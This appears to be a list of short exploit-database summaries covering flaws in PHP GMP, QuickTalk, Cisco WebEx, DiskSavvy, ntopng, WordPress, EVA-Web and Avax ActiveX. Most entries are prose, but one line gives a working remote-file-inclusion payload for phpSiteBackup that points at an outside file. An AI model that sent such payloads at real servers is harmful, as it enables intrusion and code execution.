A type-confusion vulnerability was discovered in GMP deserialization: a crafted object's __wakeup() magic method can be abused to update any already-assigned properties of any already-created objects, which results in serious security issues.
The QuickTalk forum v1.3 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by injecting a malicious string into the 'lang' parameter, which is then used to include a file from the server.
The Cisco WebEx extension allows arbitrary code execution due to a flaw in the way it handles URLs containing a specific pattern. The extension uses nativeMessaging and can execute arbitrary code when a website requests the extension to open a port for communication. The extension uses CustomEvent() objects to pass JSON messages between the webpage, the extension, and the native code.
This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
By omitting or supplying arbitrary CSRF tokens, remote attackers can bypass CSRF protection in the ntopng web interface, allowing them to make HTTP requests on an authenticated user's behalf.
This vulnerability allows an attacker to display every user:hash in the database.
This script allows an attacker to upload arbitrary files to a vulnerable WordPress installation. It takes the target host, a valid username and password, the path to the remote file, and the file to upload as arguments. The script also creates a new post every time it is run, unless a post ID is specified.
EVA-Web versions 1.1 to 2.2 are vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary files from a remote server, potentially leading to remote code execution.
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?
The Avaxswf.dll library included in the Avax Vector ActiveX v.1.3 software package is vulnerable to arbitrary data write on a remote computer. The WriteMovie method does not check whether it is being called by the application or by a malicious user, which allows insecure manipulation of local files and lets malicious users write arbitrary data to any file on a vulnerable system.